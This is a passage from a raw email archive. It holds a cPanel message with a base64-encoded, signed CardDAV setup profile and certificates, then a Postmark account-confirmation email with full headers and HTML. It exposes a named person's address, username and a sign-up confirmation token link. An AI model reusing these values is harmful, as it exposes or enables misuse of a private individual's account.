NeHI6DAfBgNVHSMEGDAWgBR5tFnme7bl5AFzgAiIyBpY9umbbjAyBggrBgEFBQcBAQQmMCQwIgYI KwYBBQUHMAKGFmh0dHA6Ly94MS5pLmxlbmNyLm9yZy8wEwYDVR0gBAwwCjAIBgZngQwBAgEwJwYD VR0fBCAwHjAcoBqgGIYWaHR0cDovL3gxLmMubGVuY3Iub3JnLzANBgkqhkiG9w0BAQsFAAOCAgEA krHnQTfreZ2B5s3iJeE6IOmQRJWjgVzPw139vaBw1bGWKCIL0vIozwzn1OZDjCQiHcFCktEJr59L 9MhwTyAWsVrdAfYf+B9haxQnsHKNY67u4s5Lzzfdu6PUzeetUK29v+PsPmI2cJkxp+iN3epi4hKu 9ZzUPSwMqtCceb7qPVxEbpYxY1p91n5PJKBLBX9eb9LU6l8zSxPWV7bK3lG4XaMJgnT9x3ies7ms FtpKK5bDtotij/l0GaKeA97pb5uwD9KgWvaFXMIEt8jVTjLEvwRdvCn294GPDF08U8lAkIv7tghl uaQh1QnlE4SEN4LOECj8dsIGJXpGUk3aU3KkJz9icKy+aUgA+2cP21uh6NcDIS3XyfaZQjmDQ993 ChII8SXWupQZVBiIpcWO4RqZk3lr7Bz5MUCwzDIA359e57SSq5CCkY0N4B6Vulk7LktfwrdGNVI5 BsC9qqxSwSKgRJeZ9wygIaehbHFHFhcBaMDKpiZlBHyzrsnnlFXCb5s8HKn5LsUgGvB24L7sGNZP 2CX7dhHov+YhD+jozLW2p9W4959Bz2EiRmqDtmiXLnzqTpXbI+suyCsohKRg6Un0RC47+cpiVwHi XZAW+cn8eiNIjqbVgXLxKPpdzvvtTnOPlC7SQZSYmdunr3Bf9b77AiC/ZidstK36dRILKz7OA54w ggT3MIID36ADAgECAhIEhn5oVx0eZy7/nNhDbNg/weYwDQYJKoZIhvcNAQELBQAwMzELMAkGA1UE BhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxDDAKBgNVBAMTA1IxMDAeFw0yNDA5MTMwMTE1 MDJaFw0yNDEyMTIwMTE1MDFaMB8xHTAbBgNVBAMTFG1naC13ZWIxMS5tYWdob3N0LnJvMIIBIjAN BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2x+rQ73VyZFAyjJZ8y9oclNJucePoar7LTCoK6D5 GFf3EqRNB57Up5RiwF1lTmaHONb8SWvc/1scKTWygMK9FIdyeXPIP9OGw4fH1L/DERJPvmDnQX42 U3H6v+EioHwcUp++56CcrRFQa2LspPamjJ93ZPm24FQJ30fBzsDOH0ulteOjiI+Bd/ZzxlFLXD3f Zfsm78GvV9oVI0+5wraVPpADx493LLiWtmutR6bMFsfRSgphgWtwB+JUjb8WEzJ0POV93JNhDDkg Qy4TEimk40vvB27JoQ+7Ql6KlVug4AnfppYD/vuL71pZobt9OnqdvskjOExNSMIufbL0W3zHzQID AQABo4ICFzCCAhMwDgYDVR0PAQH/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD AjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBQdCEz3wp7a1pHT9RckaKmOkUKZ9DAfBgNVHSMEGDAW gBS7vMNHpeS8qcbDpHIMEI2iNeHI6DBXBggrBgEFBQcBAQRLMEkwIgYIKwYBBQUHMAGGFmh0dHA6 Ly9yMTAuby5sZW5jci5vcmcwIwYIKwYBBQUHMAKGF2h0dHA6Ly9yMTAuaS5sZW5jci5vcmcvMB8G A1UdEQQYMBaCFG1naC13ZWIxMS5tYWdob3N0LnJvMBMGA1UdIAQMMAowCAYGZ4EMAQIBMIIBAwYK KwYBBAHWeQIEAgSB9ASB8QDvAHYASLDja9qmRzQP5WoC+p0w6xxSActW3SyB2bu/qznYhHMAAAGR 6Sg3/QAABAMARzBFAiEAvRO24VasQ0YHa985e6ZT/mCA7lvJCVq8T1uhd2wKDC4CIHfzJ5Jy9YSY bvcG4KB9/fIufCVbZ0k54Gqpgg4faL2VAHUAGZgQcQnw1lIuMIDSnj9ku4NuKMz5D1KO7t/OSj8W tMoAAAGR6Sg4AQAABAMARjBEAiApIxHY+ShM3gNNl01CJ1AfZ2Jprw8hpygPpHGqqt67aAIgQqKq zrSmsD1HHobzWWmcczPwV/ZTNFZvMkJZ733Uo9QwDQYJKoZIhvcNAQELBQADggEBAL6UajhgS1F9 Dah4NJqokrPCY1jMLLMI7iihRqTyZuQ/9En9DOzTThqCe21Vf2OBeYa2+fA1On/Z5SaR18E0+X1v 7dbUBRctfSxMoUBHIkwYJ5Ney0qXc8nVLyRgpvPnDhxjZzH+q1NYzuwDNZHRxiC3yuzKuydzAQwJ uJaQoC98B8098PvDnkm6u6VlaoBqeMBoSxZqXq2qbYShfhttxOeE5OsIFA/q0lAZGTYc/eGUCroG 7PXyrQhc2aBR5BDcPn4favPwYUT3KsjDOGp3OXPn+0V+0beabGTON36rsklh9Lfl5piKhFRxhbJ/ IVt59Cr1SBgBA+TFd1j7uVu3Zi8xggJbMIICVwIBATBJMDMxCzAJBgNVBAYTAlVTMRYwFAYDVQQK Ew1MZXQncyBFbmNyeXB0MQwwCgYDVQQDEwNSMTACEgSGfmhXHR5nLv+c2ENs2D/B5jANBglghkgB ZQMEAgEFAKCB5DAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0yNDA5 MTgwNzMzMjZaMC8GCSqGSIb3DQEJBDEiBCAEdODrWu3c042riam38YACxsETadk/d626oiZvhtAb iTB5BgkqhkiG9w0BCQ8xbDBqMAsGCWCGSAFlAwQBKjALBglghkgBZQMEARYwCwYJYIZIAWUDBAEC MAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzANBggq hkiG9w0DAgIBKDANBgkqhkiG9w0BAQEFAASCAQCXbmtfE+Dp1nWNnOgM7H5az3SKg7k1ZWbaSsBe T0bAKGv1tZkzQAsHb05x7xCuyyZMpiY2UXh9RUha8WK1rGWhI9OA1WKDr/th7vPl2QknDPIqGAT3 x6Og1ihz6drunj123YlLB7fLCVne51Tl7q0PWoTqcqvTJl93BMCGK0inoZ9pq+ubxqdxRJ105y8O x+0wgZ640kDfqD9dysQuxeF5g1qUnOTkXD91ROZyFrNi7L4zy1oKkgM2j1nVo7hvdMBES9ACsvK6 lwc5qv6tJ1dI66T5EsuCoLjrrv8B5DSSVrqQDdgf3hAEhilMTi0pxYGDJRFRHFgLeub0EDa/a0kj --mixed-Cpanel::Email::Object-3140096-1726644806-0.561888666747986 Content-Type: application/octet-stream; x-unix-mode=0600; name="carddav-rudolph.perry@bloomingcostamices.com.mobileconfig" Content-Disposition: attachment; filename="carddav-rudolph.perry@bloomingcostamices.com.mobileconfig" Content-Transfer-Encoding: base64 MIIUXwYJKoZIhvcNAQcCoIIUUDCCFEwCAQExDzANBglghkgBZQMEAgEFADCCB80GCSqGSIb3DQEH AaCCB74Egge6PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4NCjwhRE9DVFlQ RSBwbGlzdCBQVUJMSUMgIi0vL0FwcGxlLy9EVEQgUExJU1QgMS4wLy9FTiIgImh0dHA6Ly93d3cu YXBwbGUuY29tL0RURHMvUHJvcGVydHlMaXN0LTEuMC5kdGQiPg0KPHBsaXN0IHZlcnNpb249IjEu MCI+DQo8ZGljdD4NCiAgPGtleT5QYXlsb2FkQ29udGVudDwva2V5Pg0KICA8YXJyYXk+DQogICAg PGRpY3Q+DQogICAgICAgIDxrZXk+Q2FyZERBVkFjY291bnREZXNjcmlwdGlvbjwva2V5Pg0KICAg ICAgICA8c3RyaW5nPnJ1ZG9scGgucGVycnlAYmxvb21pbmdjb3N0YW1pY2VzLmNvbSBTZWN1cmUg Q29udGFjdHMgU2V0dXA8L3N0cmluZz4NCiAgICAgICAgPGtleT5DYXJkREFWSG9zdE5hbWU8L2tl eT4NCiAgICAgICAgPHN0cmluZz5tZ2gtd2ViMTEubWFnaG9zdC5ybzoyMDgwPC9zdHJpbmc+DQog ICAgICAgIDxrZXk+Q2FyZERBVlVzZVNTTDwva2V5Pg0KICAgICAgICA8dHJ1ZS8+DQogICAgICAg IDxrZXk+Q2FyZERBVlVzZXJuYW1lPC9rZXk+DQogICAgICAgIDxzdHJpbmc+cnVkb2xwaC5wZXJy eUBibG9vbWluZ2Nvc3RhbWljZXMuY29tPC9zdHJpbmc+DQogICAgICAgIDxrZXk+UGF5bG9hZERl c2NyaXB0aW9uPC9rZXk+DQogICAgICAgIDxzdHJpbmc+cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nv c3RhbWljZXMuY29tIFNlY3VyZSBDb250YWN0cyBTZXR1cDwvc3RyaW5nPg0KICAgICAgICA8a2V5 PlBheWxvYWREaXNwbGF5TmFtZTwva2V5Pg0KICAgICAgICA8c3RyaW5nPkNhcmREQVY8L3N0cmlu Zz4NCiAgICAgICAgPGtleT5QYXlsb2FkSWRlbnRpZmllcjwva2V5Pg0KICAgICAgICA8c3RyaW5n PmNwYW5lbC5tYWlsLm9yZy5ydWRvbHBoLnBlcnJ5LmJsb29taW5nY29zdGFtaWNlcy5jb208L3N0 cmluZz4NCiAgICAgICAgPGtleT5QYXlsb2FkT3JnYW5pemF0aW9uPC9rZXk+DQogICAgICAgIDxz dHJpbmc+Ymxvb21pbmdjb3N0YW1pY2VzLmNvbTwvc3RyaW5nPg0KICAgICAgICA8a2V5PlBheWxv YWRUeXBlPC9rZXk+DQogICAgICAgIDxzdHJpbmc+Y29tLmFwcGxlLmNhcmRkYXYuYWNjb3VudDwv c3RyaW5nPg0KICAgICAgICA8a2V5PlBheWxvYWRVVUlEPC9rZXk+DQogICAgICAgIDxzdHJpbmc+ MzIyYmMzZDgtMWE3Ni1hZmM5LWFmYjYtMzEwZDg5NDY2ODNiPC9zdHJpbmc+DQogICAgICAgIDxr ZXk+UGF5bG9hZFZlcnNpb248L2tleT4NCiAgICAgICAgPGludGVnZXI+MTwvaW50ZWdlcj4NCiAg ICA8L2RpY3Q+DQogIDwvYXJyYXk+DQogIDxrZXk+UGF5bG9hZERlc2NyaXB0aW9uPC9rZXk+DQog IDxzdHJpbmc+cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nvc3RhbWljZXMuY29tIFNlY3VyZSBDb250 YWN0cyBTZXR1cDwvc3RyaW5nPg0KICA8a2V5PlBheWxvYWREaXNwbGF5TmFtZTwva2V5Pg0KICA8 c3RyaW5nPnJ1ZG9scGgucGVycnlAYmxvb21pbmdjb3N0YW1pY2VzLmNvbSBTZWN1cmUgQ29udGFj dHMgU2V0dXA8L3N0cmluZz4NCiAgPGtleT5QYXlsb2FkSWRlbnRpZmllcjwva2V5Pg0KICA8c3Ry aW5nPmNwYW5lbC5tYWlsLm9yZy5ydWRvbHBoLnBlcnJ5LmJsb29taW5nY29zdGFtaWNlcy5jb20t Y2FyZGRhdjwvc3RyaW5nPg0KICA8a2V5PlBheWxvYWRPcmdhbml6YXRpb248L2tleT4NCiAgPHN0 cmluZz5jcGFuZWwubWFpbC5vcmcucnVkb2xwaC5wZXJyeS5ibG9vbWluZ2Nvc3RhbWljZXMuY29t PC9zdHJpbmc+DQogIDxrZXk+UGF5bG9hZFJlbW92YWxEaXNhbGxvd2VkPC9rZXk+DQogIDxmYWxz ZS8+DQogIDxrZXk+UGF5bG9hZFR5cGU8L2tleT4NCiAgPHN0cmluZz5Db25maWd1cmF0aW9uPC9z dHJpbmc+DQogIDxrZXk+UGF5bG9hZFVVSUQ8L2tleT4NCiAgPHN0cmluZz40MmI4YWQ4ZS1iMDgx LTQxZmItZmJiMi04NTllMWRlYWVkYmM8L3N0cmluZz4NCiAgPGtleT5QYXlsb2FkVmVyc2lvbjwv a2V5Pg0KICA8aW50ZWdlcj4xPC9pbnRlZ2VyPg0KPC9kaWN0Pg0KPC9wbGlzdD4NCqCCCgQwggUF MIIC7aADAgECAhBLqFKT95ovonMGS6gEjXXQMA0GCSqGSIb3DQEBCwUAME8xCzAJBgNVBAYTAlVT MSkwJwYDVQQKEyBJbnRlcm5ldCBTZWN1cml0eSBSZXNlYXJjaCBHcm91cDEVMBMGA1UEAxMMSVNS RyBSb290IFgxMB4XDTI0MDMxMzAwMDAwMFoXDTI3MDMxMjIzNTk1OVowMzELMAkGA1UEBhMCVVMx FjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxDDAKBgNVBAMTA1IxMDCCASIwDQYJKoZIhvcNAQEBBQAD ggEPADCCAQoCggEBAM9X5ebEVBLttEf+ySdYdkZQKIwdPojfBZ3VtRgpvd21Wr/69s6jvq8AIUti Wlo8AS/FWAP2if+OEUPrwbXgFAeWj28f1+e6gTkJdWW3wq8YWzcmKOej9AcrbRr/q1i8la5A/+nL V8S1W394DRhhvBfnVMa7SZHNbhjRgIXupmU2vHTqvFBM6vwh8zgWk5S6sNNrOAbNFhJ6ylJ1yK12 ssKcXZhFXG9he8Yt7jwTUoYB2VfmOBzfjbUfkpGa50oczEWoclXwsOajB+z9pxtmnj9Ii3GEcVjJ OvrvXvJbRCs8dOePskfBB2rNmrcNlvcSgSZRVArsYfb39eLyisiVDY0CAwEAAaOB+DCB9TAOBgNV HQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIGA1UdEwEB/wQIMAYB Af8CAQAwHQYDVR0OBBYEFLu8w0el5LypxsOkcgwQjaI14cjoMB8GA1UdIwQYMBaAFHm0WeZ7tuXk AXOACIjIGlj26ZtuMDIGCCsGAQUFBwEBBCYwJDAiBggrBgEFBQcwAoYWaHR0cDovL3gxLmkubGVu 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 --mixed-Cpanel::Email::Object-3140096-1726644806-0.561888666747986-- PK }��Y����n �n B 1727025212.M855354P518435.mgh-web11.maghost.ro,S=28349,W=28859:2,Snu ��٘� Return-Path: <pm_bounces@pmbounces.postmarkapp.com> Delivered-To: rudolph.perry@bloomingcostamices.com Received: from mgh-web11.maghost.ro by mgh-web11.maghost.ro with LMTP id 5r78MTxQ8GYj6QcAJwI5NA (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) for <rudolph.perry@bloomingcostamices.com>; Sun, 22 Sep 2024 20:13:32 +0300 Return-path: <pm_bounces@pmbounces.postmarkapp.com> Envelope-to: rudolph.perry@bloomingcostamices.com Delivery-date: Sun, 22 Sep 2024 20:13:32 +0300 Received: from sc-ord-mta118.mtasv.net ([50.31.156.118]:56121) by mgh-web11.maghost.ro with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384 (Exim 4.97.1) (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) id 1ssQ9K-00000002Aq1-2V99 for rudolph.perry@bloomingcostamices.com; Sun, 22 Sep 2024 20:13:32 +0300 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; s=pm20231108; d=pm.mtasv.net; h=From:Date:Subject:Message-Id:To:MIME-Version:Content-Type:Date:From: Message-ID:Reply-To:Sender:Subject:To:CC; t=1727025210; x=1727111610; bh=aks3o4ErgnD6O2TFUb8nx1pVFHYWpDJR+QxJS/Rly00=; b=huL9mq8w6q0fHlIf46Hog6YNnL9mNg+hWLIhVsippyagCprWYm6rx2UKZhwPznLwJaKfBrcR1SRp HCHs5hCISW0+N2ruHcWuZVdB1er4rZoq9iwESWg0jMSzpdxDhGOnxwTC6q9X4dqRMvyBwxCRIZ2y u1nJMAhOFcS81ZCZjPA= Received: by sc-ord-mta118.mtasv.net id hu18103864om for <rudolph.perry@bloomingcostamices.com>; Sun, 22 Sep 2024 13:12:47 -0400 (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) X-PM-IP: 50.31.156.118 X-IADB-IP: 50.31.156.118 X-IADB-IP-REVERSE: 118.156.31.50 DKIM-Signature: v=1; a=rsa-sha256; d=postmarkapp.com; s=20240110170422pm; c=relaxed/relaxed; i=support@postmarkapp.com; t=1727025167; x=1727197967; h=date:date:from:from:message-id:reply-to:sender:subject:subject:to:to:cc: feedback-id:mime-version:content-type; bh=aks3o4ErgnD6O2TFUb8nx1pVFHYWpDJR+QxJS/Rly00=; b=KCzn3ZYYEccd7LSoytQutAhWwvb9WlI6PW+gssuEf0dyhQuhPM6uLTSET43jjLHmJe5zf6XOFnd 0usxyy+kzgdRR76GHe5hWoQBdbyaQH8fxHZoc8N+4w1vKRMaZ0c6IDaSAp9352N8FU+FPVVpsh4B/ Kkfeequlze7kuZiempQ= From: Postmark Support <support@postmarkapp.com> Date: Sun, 22 Sep 2024 17:12:47 +0000 Subject: Action Required: Confirm your email Message-Id: <0c1fa888-1532-40f5-b74e-ca713be58051@mtasv.net> To: rudolph.perry@bloomingcostamices.com Feedback-ID: s40483-c2lnbnVw:s40483:a50355:postmark X-Complaints-To: abuse@postmarkapp.com X-PM-Message-Id: 0c1fa888-1532-40f5-b74e-ca713be58051 X-PM-Tag: signup X-PM-RCPT: |bTB8NTAzNTV8NDA0ODN8cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nvc3RhbWljZXMuY29t| X-PM-Message-Options: v1;1.BZrXpOAguVjDvlYOgKWyTw.wdjhpiw5HgbD4ANnZI9kqol6jSJFCv45yThCp1cTRuT1-wM3eQkszCyMzINdeCx_nZEA8EggePd-Vt3iatmX7BwSRKM_zeB-uebG6bDL7iRHvY_ZKoY6leqpun0abvFcy6INfgLCVqjF5blCan5pNtH_v1902G-JUiTI0MRRxIfi3M0UbsXk8VLvwc9DbC_G MIME-Version: 1.0 X-PM-MTA-Pool: transactional-1 Content-Type: multipart/alternative; boundary=mk3-bc7b03a5e037435f9b915a8211399b76; charset=UTF-8 X-Spam-Status: No, score=0.4 X-Spam-Score: 4 X-Spam-Bar: / X-Ham-Report: Spam detection software, running on the system "mgh-web11.maghost.ro", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: Hi Rudolph.Perry 👋 Welcome to Postmark, new friend! Your username to log in is Rudolph.Perry. To get your account ready for sending, we’ve created a Sender Signature for rudolph.perry@bloomingcostamices.com. We’ll use that email address as the “From” address on the emails you send. But [...] Content analysis details: (0.4 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 SPF_PASS SPF: sender matches SPF record -0.0 SPF_HELO_PASS SPF: HELO matches SPF record -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's domain 0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or identical to background 0.0 HTML_MESSAGE BODY: HTML included in message 0.5 KAM_REALLYHUGEIMGSRC RAW: Spam with image tags with ridiculously huge http urls -0.0 DKIMWL_WL_HIGH DKIMwl.org - High trust sender X-Spam-Flag: NO --mk3-bc7b03a5e037435f9b915a8211399b76 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Hi Rudolph.Perry =F0=9F=91=8B Welcome to Postmark, new friend! Your username to log in is Rudolph.Perry. To get your account ready for sending, we=E2=80=99ve created a Sender Signa= ture for rudolph.perry@bloomingcostamices.com. We=E2=80=99ll use that email= address as the =E2=80=9CFrom=E2=80=9D address on the emails you send. But = before we can do that, we need you to confirm that this email belongs to yo= u: https://signatures.postmarkapp.com/confirm?token=3D58fc48e4-719b-45e0-a0ce-= 5204c6c366f6 Want to use another =E2=80=9CFrom=E2=80=9D name and address to send emails?= No problem! Add and verify other Sender Signatures (https://account.postma= rkapp.com/signature_domains) (or remove ones you no longer need) at any tim= e in the app. Other things to know -------------------- ** Test mode and requesting account approval ** Your account is currently in test mode. That allows you to get familiar wit= h Postmark, and send up to 100 emails to domains that you=E2=80=99ve verifi= ed. Once you=E2=80=99re ready to send emails to others, we=E2=80=99ll need = to approve your account. Why? Reviewing each account helps us tell the resp= onsible senders (https://postmarkapp.com/support/article/1082-what-types-of= -messages-are-a-good-fit-for-postmark) (that=E2=80=99s you!) apart from the= spammers (boo!), so we can maintain our stellar deliverability rates for a= ll customers. So whenever you=E2=80=99re ready, submit an approval request = (https://account.postmarkapp.com/account_approval/apply). ** Handy resources to help you get started ** Check out our easy-to-follow getting started guides (https://postmarkapp.co= m/manual) and detailed developer docs (https://postmarkapp.com/developer) t= o get set up in Postmark. Still need help? Our Customer Success team is pre= tty darn great, so just reply to this message if you have any questions. Happy sending, The Postmark Team --- ActiveCampaign LLC (https://activecampaign.com) 1 North Dearborn St, 5th Floor, Chicago, IL 60602 --mk3-bc7b03a5e037435f9b915a8211399b76 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.= w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns=3D"http://www.w3.= org/1999/xhtml"><head> <meta name=3D"viewport" content=3D"width=3Ddevice-width, initial-scale=3D= 1.0"> <meta name=3D"x-apple-disable-message-reformatting"> <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8= "> <meta name=3D"color-scheme" content=3D"light dark"> <meta name=3D"supported-color-schemes" content=3D"light dark"> <title>Postmark</title> <style type=3D"text/css" rel=3D"stylesheet" media=3D"all">@media screen= and (max-width: 599px) { pre { width: 230px } } @media screen and (max-width: 599px) { .email-top_inner { width: 100% } } @media (prefers-color-scheme: dark) { .email-body_inner--other-things, .ema= il-body_inner--other-things .content-block { background-color: #FFDE00 !imp= ortant } } @media screen and (max-width: 599px) { .email-body_inner, .email-footer { w= idth: 100% } } @media only screen and (max-width: 500px) { .btn { width: 100% !important }= } @media screen and (max-width: 599px) { .hero { padding: 40px 30px 0 !import= ant } } @media screen and (max-width: 599px) { .welcome { padding: 30px 30px 10px != important } } @media screen and (max-width: 599px) { .signature { padding: 0 30px !import= ant } .signature_author, .signature_action { width: 100%; height: auto } .s= ignature_action { text-align: center } .signature_action td { padding-top: = 10px; padding-bottom: 25px; text-align: center } .postmark .signature--logo= .signature_action td { padding-top: 10px } } @media screen and (max-width: 599px) { .content-block { padding: 30px !impo= rtant } .content-block--image { padding-top: 0 !important; padding-bottom: = 0 !important } .content-block_image-container { text-align: center } .conte= nt-block_image-container, .content-block_body-container { width: 100% } .co= ntent-block--small .content-block_title { margin-top: 15px !important } } @media screen and (max-width: 599px) { .divider { padding: 20px 30px !impor= tant } .divider_image--desktop { display: none } .divider_image--mobile { d= isplay: block !important; height: auto !important; max-height: none !import= ant; font-size: 15px !important } .divider--thick { padding: 20px 0 !import= ant } .divider--no-padding { padding-top: 0 !important; padding-bottom: 0 != important } .divider--no-pad-bottom { padding-bottom: 0 !important } } @media screen and (max-width: 599px) { .testimonial { padding: 20px 30px !i= mportant } .testimonial_container { width: 100% } } @media screen and (max-width: 599px) { .cta-banner { padding: 30px !importa= nt } .cta-banner_title, .cta-banner_sub-title { text-align: center !importa= nt } .cta-banner_body, .cta-banner_action { width: 100% } .cta-banner_actio= n, .cta-banner_action td { text-align: center !important } .cta-banner--cen= tered .cta-banner_action td { text-align: center } } @media screen and (max-width: 599px) { .footer { padding: 0 30px !important= } .footer_table { width: 100% } .footer--slim { padding: 15px 30px !import= ant } } @media screen and (max-width: 599px) { .product-ad { float: none !important= ; width: 100%; margin-bottom: 30px } .product-ad_container { width: 220px }= } @media screen and (max-width: 599px) { .email-prefs { padding: 12px 30px !i= 